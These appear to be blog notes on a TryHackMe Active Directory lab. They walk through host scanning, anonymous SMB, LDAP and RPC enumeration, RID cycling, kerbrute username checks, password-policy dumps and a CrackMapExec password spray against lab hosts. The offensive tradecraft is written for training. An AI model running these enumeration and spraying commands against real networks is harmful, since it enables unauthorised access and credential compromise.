Attacktive Directory Notes

-

Attacktive Directory

fping

Just like ping, fping uses Internet Control Message Protocol (ICMP) requests to determine if a host is live or not. However, with fping, we can specify any number of targets, including a subnet, making it more versatile than the ping command. Instead of sending a packet to one target until it replies or times out, fping will move to the next target after each request.

We can run the following command to discover live hosts in our target network:

Terminal 
           user@tryhackme$ fping -agq 10.211.11.0/24
10.211.11.1
10.211.11.10
10.211.11.20
10.211.11.250
  • -a: shows systems that are alive.
  • -g: generates a target list from a supplied IP netmask.
  • -q: quiet mode, doesn't show per-probe results or ICMP error messages.

 

 

Nmap

We can also use Nmap in ping scan mode (-sn) to probe the entire subnet:

nmap -sn 10.211.11.0/24

  • -sn: Ping scan to determine which hosts are up without port scanning.

 

 

These are some common Active Directory ports and protocols:

Port Protocol What it Means
88 Kerberos Potential for Kerberos-based enumeration
135 MS-RPC Potential for RPC enumeration (null sessions)
139 SMB/NetBIOS Legacy SMB access
389 LDAP LDAP queries to AD
445 SMB Modern SMB access, critical for enumeration
464 Kerberos (kpasswd) Password-related Kerberos service

We can run a service version scan with these specific ports to help identify the DC:

nmap -p 88,135,139,389,445 -sV -sC -iL hosts.txt

  • -sV: This enables version detection. Nmap will try to determine the version of the services running on the open ports.
  • -sC: Runs Nmap Scripting Engine (NSE) scripts in the default category.
  • -iL: This tells Nmap to read the list of target hosts from the file hosts.txt. Each line in this file should contain a single IP address or hostname.

 

We could use this command to scan for all open ports:

nmap -sS -p- -T3 -iL hosts.txt -oN full_port_scan.txt

  • -sS: TCP SYN scan, which is stealthier than a full connect scan
  • -p-: Scans all 65,535 TCP ports.
  • -T3: Sets the timing template to "normal" to balance speed and stealth.
  • -iL hosts.txt: Inputs the list of live hosts from the previous nmap command.
  • -oN full_port_scan.txt: Outputs the results to a file.

 

 We will focus on enumerating network shares using the Server Message Block (SMB) protocol. We will use various tools like Nmap to discover the relevant listening ports and identify services. Then, we will attempt to access their contents from the AttackBox using tools such as smbclient and smbmap. Furthermore, we will try to grab the contents of accessible SMB shares

 

  • TCP 88 (Kerberos): Kerberos uses this port for authentication in the Active Directory. From a penetration testing point of view, it can be a goldmine for ticket attacks like Pass-the-Ticket and Kerberoasting.
  • TCP 135 (RPC Endpoint Mapper): This TCP port is used for Remote Procedure Calls (RPC). It might be leveraged to identify services for lateral movement or remote code execution via DCOM.
  • TCP 139 (NetBIOS Session Service): This port is used for file sharing in older Windows systems. It can be abused for null sessions and information gathering.
  • TCP 389 (LDAP): This TCP port is used by the Lightweight Directory Access Protocol (LDAP). It is in plaintext and can be a prime target for enumerating AD objects, users, and policies.
  • TCP 445 (SMB): Critical for file sharing and remote admin; abused for exploits like EternalBlue, SMB relay attacks, and credential theft.
  • TCP 636 (LDAPS): This port is used by Secure LDAP. Although it is encrypted, it can still expose AD structure if misconfigured and can be abused via certificate-based attacks like AD CS exploitation.

 

  detect their versions with -sV, and allow default scripts to run with -sC. Our final command will be, nmap -p 88,135,139,389,445,636 -sV -sC TARGET_IP

 

Listing SMB Shares

smbclient is a command-line tool that allows interaction with SMB shares and is part of the Samba suite. It is similar to an FTP client. You can use it to list, upload, download, and browse files on a remote SMB server. In the terminal below, we try to list the shares via the -L option, with no password, hence the -N option. We can see some interesting shares below running smbclient -L //TARGET_IP -N.

AttackBox Terminal
           root@tryhackme:~# smbclient -L //10.211.11.10 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        AnonShare       Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SharedFiles     Disk      
        SYSVOL          Disk      Logon server share 
        UserBackups     Disk      
SMB1 disabled -- no workgroup available

Another tool is smbmap, a reconnaissance tool that enumerates SMB shares across a host. It can be used to display read and write permissions for each share. It’s instrumental for quickly identifying accessible or misconfigured shares without manually connecting to each one. Below is an example of running smbmap -H TARGET_IP. Note that smbmap is located in /root/Desktop/Tools/Miscellaneous/smbmap on the AttackBox.

AttackBox Terminal
           root@tryhackme:~/Desktop/Tools/Miscellaneous/smbmap# ./smbmap.py -H 10.211.11.10
[+] Finding open SMB ports....
[+] User SMB session established on 10.211.11.10...
[+] IP: 10.211.11.10:445        Name: 10.211.11.10        
        Disk                     Permissions     Comment
        ----                     -----------     -------
        ADMIN$                   NO ACCESS       Remote Admin
        AnonShare                READ, WRITE
        C$                       NO ACCESS       Default share
        IPC$                     NO ACCESS       Remote IPC
        NETLOGON                 NO ACCESS       Logon server share 
        SharedFiles              READ, WRITE
        SYSVOL                   NO ACCESS       Logon server share 
        UserBackups              READ, WRITE

Running either of the above commands, we can notice that there are three non-standard shares that catch our attention: AnonShare, SharedFiles and UserBackups.

It is worth noting that you can also discover which shares grant access using Nmap. Using Nmap’s smb-enum-shares script, we can explore which shares give READ/WRITE, READ, or no access. The syntax is nmap -p445 --script smb-enum-shares 10.211.11.10.

 

Accessing SMB Shares

 

We will target all the shares that showed READ access among their permissions when we ran smbmap. To use smbclient to connect to a share, you can use smbclient //TARGET_IP/SHARE_NAME -N. After connecting, we listed the files by issuing ls as shown below. Once you find the filename, you can download it using get file_name. In the terminal above, we did a get Mouse_and_Malware.txt to download the file to the AttackBox.

AttackBox Terminal
           root@tryhackme:~# smbclient //10.211.11.10/SharedFiles -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 15 16:03:40 2025
  ..                                  D        0  Thu May 15 16:03:40 2025
  Mouse_and_Malware.txt               A     1141  Thu May 15 10:40:19 2025

                7863807 blocks of size 4096. 3459432 blocks available
smb: \> get Mouse_and_Malware.txt
getting file \Mouse_and_Malware.txt of size 1141 as Mouse_and_Malware.txt (69.6 KiloBytes/sec) (average 69.6 KiloBytes/sec)
smb: \> exit

Since we don’t have login credentials, we are trying to access the various shares without a password, i.e., with the -N option. However, if you have a username and password to access the SMB share, you can easily specify them with --user=USERNAME --password=PASSWORD or -U 'username%password'. Note that for domain accounts, you need to specify the domain using -W.

 

 The enum4linux or enum4linux-ng is a powerful tool that performs extensive enumeration over SMB. You can try enum4linux -a TARGET_IP to get a trove of information

 

 

LDAP Enumeration (Anonymous Bind)

Lightweight Directory Access Protocol (LDAP) is a widely used protocol for accessing and managing directory services, such as Microsoft Active Directory. LDAP helps locate and organise resources within a network, including users, groups, devices, and organisational information, by providing a central directory that applications and users can query.
Some LDAP servers allow anonymous users to perform read-only queries. This can expose user accounts and other directory information.

We can test if anonymous LDAP bind is enabled with ldapsearch:

ldapsearch -x -H ldap://10.211.11.10 -s base

  • -x: Simple authentication, in our case, anonymous authentication.
  • -H: Specifies the LDAP server.
  • -s: Limits the query only to the base object and does not search subtrees or children.

If it is enabled, we should see lots of data, similar to the output below:

Terminal
           user@tryhackme$ ldapsearch -x -H ldap://10.211.11.10 -s base

 ldapsearch -x -H ldap://10.211.11.10 -b "dc=tryhackme,dc=loc" "(objectClass=person)"

 

Enum4linux-ng

enum4linux-ng is a tool that automates various enumeration techniques against Windows systems, including user enumeration. It utilizes SMB and RPC protocols to gather information such as user lists, group memberships, and share details.

We can run the following command to get as much information as possible from the DC:

enum4linux-ng -A 10.211.11.10 -oA results.txt

  • -A: Performs all available enumeration functions (users, groups, shares, password policy, RID cycling, OS information and NetBIOS information).
  • -oA: Writes output to YAML and JSON files.

 

 

 

RPC Enumeration (Null Sessions)

Microsoft Remote Procedure Call (MSRPC) is a protocol that enables a program running on one computer to request services from a program on another computer, without needing to understand the underlying details of the network. RPC services can be accessed over the SMB protocol. When SMB is configured to allow null sessions that do not require authentication, an unauthenticated user can connect to the IPC$ share and enumerate users, groups, shares, and other sensitive information from the system or domain.

We can run the following command to verify null session access with:

rpcclient -U "" 10.211.11.10 -N

  • -U: Used to specify the username, in our case, we are using an empty string for anonymous login.
  • -N: Tells RPC not to prompt us for a password.

If successful, we can enumerate users with: enumdomusers

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sshd] rid:[0x649]
user:[gerald.burgess] rid:[0x650]
user:[nigel.parsons] rid:[0x651]
user:[guy.smith] rid:[0x652]
user:[jeremy.booth] rid:[0x653]

 

RID Cycling

In Active Directory, RID (Relative Identifier) ranges are used to assign unique identifiers to user and group objects. These RIDs are components of the Security Identifier (SID), which uniquely identifies each object within a domain. Certain RIDs are well-known and standardised.

500 is the Administrator account, 501 is the Guest account and 512-514 are for the following groups: Domain Admins, Domain users and Domain guests. User accounts typically start from RID 1000 onwards.

We can use enum4linux-ng to determine the RID range, or we can start with a known range, for example, 1000-1200, and increment if we get results.

If enumdomusers is restricted, we can manually try querying each individual user RID with this bash command:

Terminal
 user@tryhackme$ for i in $(seq 500 2000); do echo "queryuser $i" |rpcclient -U "" -N 10.211.11.10 2>/dev/null | grep -i "User Name"; done
	User Name   :	sshd
	User Name   :	gerald.burgess
	User Name   :	nigel.parsons
	User Name   :	guy.smith
	User Name   :	jeremy.booth
	User Name   :	barbara.jones
  • for i in $(seq 500 2000): We first run a for loop to iterate through a range of possible RIDs to identify valid user accounts.
  • echo "queryuser $i": queries information about the user associated with RID $i.
  • 2>/dev/null: Redirects any error messages (standard error) to /dev/null, effectively silencing them.
  • | grep -i "User Name": filters the output to display lines containing "User Name", ignoring case sensitivity (-i).

Username Enumeration With Kerbrute

Tools like enum4linux-ng or rpcclient may return some usernames, but they could be:

  • Disabled accounts
  • Non-domain accounts
  • Fake honeypot users
  • Or even false positives

Running those through kerbrute lets us confirm which ones are real, active AD users, which allows us to target them more accurately with password sprays.

We can create a user list thanks to the usernames we gathered with the previous tools.

Example Terminal
           user@tryhackme$ cat users.txt
Administrator
Guest
krbtgt
sshd

 

Kerbrute Installation

1.) Download a precompiled binary for your OS - https://github.com/ropnop/kerbrute/releases.

2.) Rename kerbrute_linux_amd64 to kerbrute.

3.) Run chmod +x kerbrute to make kerbrute executable.

Please note that kerbrute is not installed on the AttackBox, and will require internet access if you wish to download and experiment with it.

Kerbrute performs brute-force username enumeration against Kerberos:

Example Terminal
user@tryhackme$ ./kerbrute userenum --dc 10.211.11.10 -d tryhackme.loc users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 05/16/25 - Ronnie Flathers @ropnop

2025/05/16 11:58:16 >  Using KDC(s):
2025/05/16 11:58:16 >  	10.211.11.10:88

2025/05/16 11:58:16 >  [+] VALID USERNAME:	 WRK$@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 guy.smith@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 sshd@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 nigel.parsons@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 gerald.burgess@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 barbara.jones@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 Administrator@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 jeremy.booth@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 kathryn.williams@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 danny.baker@tryhackme.loc

 

rpcclient

We can use rpcclient via a null session to query the DC for the password policy:

rpcclient -U "" 10.211.11.10 -N

And then we can run the getdompwinfo command:

Example Terminal
           rpcclient $> getdompwinfo
min_password_length: 12
password_properties: 0x00000001
	DOMAIN_PASSWORD_COMPLEX

 

CrackMapExec

           user@tryhackme$ crackmapexec smb 10.211.11.10 --pass-pol
SMB         10.211.11.10    445    DC               [*] Windows Server 2019 Datacenter 17763 x64 (name:DC) (domain:tryhackme.loc) (signing:True) (SMBv1:True)
SMB         10.211.11.10    445    DC               [+] Dumping password info for domain: TRYHACKME
SMB         10.211.11.10    445    DC               Minimum password length: 18
SMB         10.211.11.10    445    DC               Password history length: 21
SMB         10.211.11.10    445    DC               Maximum password age: 41 days 23 hours 53 minutes
SMB         10.211.11.10    445    DC               
SMB         10.211.11.10    445    DC               Password Complexity Flags: 000001
SMB         10.211.11.10    445    DC                   Domain Refuse Password Change: 0
SMB         10.211.11.10    445    DC                   Domain Password Store Cleartext: 0
SMB         10.211.11.10    445    DC                   Domain Password Lockout Admins: 0
SMB         10.211.11.10    445    DC                   Domain Password No Clear Change: 0
SMB         10.211.11.10    445    DC                   Domain Password No Anon Change: 0
SMB         10.211.11.10    445    DC                   Domain Password Complex: 1
SMB         10.211.11.10    445    DC               
SMB         10.211.11.10    445    DC               Minimum password age: 1 day 4 minutes
SMB         10.211.11.10    445    DC               Reset Account Lockout Counter: 30 minutes
SMB         10.211.11.10    445    DC               Locked Account Duration: 30 minutes
SMB         10.211.11.10    445    DC               Account Lockout Threshold: 10
SMB         10.211.11.10    445    DC               Forced Log off Time: Not Set

Performing Password Spraying Attacks

We have gathered a solid user list from our user enumeration in the previous task; we now need to create a small list of common passwords.
Through our password policy enumeration, we saw that the password complexity is equal to 1:

  • In rpcclient: password_properties: 0x00000001
  • With CrackMapExec: Password Complexity Flags: 000001

This means that at least three of the following four conditions need to be respected for a password to be created:

  1. Uppercase letters
  2. Lowercase letters
  3. Digits
  4. Special characters

 

We can use CrackMapExec to run our password spraying attack against the WRK computer:

user@tryhackme$ crackmapexec smb 10.211.11.20 -u users.txt -p passwords.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Copying default configuration file
SMB         10.211.11.20    445    WRK              [*] Windows 10.0 Build 17763 x64 (name:WRK) (domain:tryhackme.loc) (signing:False) (SMBv1:False)
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\Administrator:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\Guest:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\krbtgt:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\DC$:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\WRK$:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-]
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\asrepuser1:Password1! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [+] tryhackme.loc\*****:******

 

 


 

 

 

 

 

 

 

 

Comments

Post a Comment

Popular posts from this blog

Windows Privilege Escalation THM Room

-
Image
Windows Privilege Escalation     INTRODUCTION During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target. This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.  If you want to brush up on your skills first, you can have a look through the   Windows Fundamentals Module   or the   Hacking Windows Module .   Windows Privilege Escalation Windows Privilege Escalation Simply put, privilege escalation consists of using given access to a host with "user A" and leveraging it to gain access to "user B" by abusing a weakness in the ta...
Read more

Linux Privilege Escalation THM Room

-
Image
 Linux Privilege Escalation All Task Solution All Task Solution 2   Privilege escalation is a journey. There are no silver bullets, and much depends on the specific configuration of the target system. The kernel version, installed applications, supported programming languages, other users' passwords are a few key elements that will affect your road to the root shell. This room was designed to cover the main privilege escalation vectors and give you a better understanding of the process. This new skill will be an essential part of your arsenal whether you are participating in CTFs, taking certification exams, or working as a penetration tester.   What does "privilege escalation" mean? At it's core, Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it's the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to ga...
Read more

Eternal blue Using Termux

-
Image
  Introduction On 14 April 2017, a hacker group know by the name of Shadow Brokers leaked exploitation toolkit used by the National Security Agency (NSA). The leak was also used as part of a worldwide WannaCry ransomware attack. EternalBlue is also an exploit developed and used by the NSA according to former NSA employees. Lab Environment Target Machine: Windows 7 Ultimate x64 bit Attacker Machine: Android 5.1 What is EternalBlue EternalBlue actually exploits a vulnerabili t y found in Server Message Block (SMB) protocol of Microsoft Windows various platforms. This vulnerability can be found under CVE-2017–0144 in the CVE catalog.The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. Windows 7 Operating with Release Effected by EternalBlue For Full List of Operating System Effected by Eternal Blue please : Click Here Installing Metasploit Framework on ...
Read more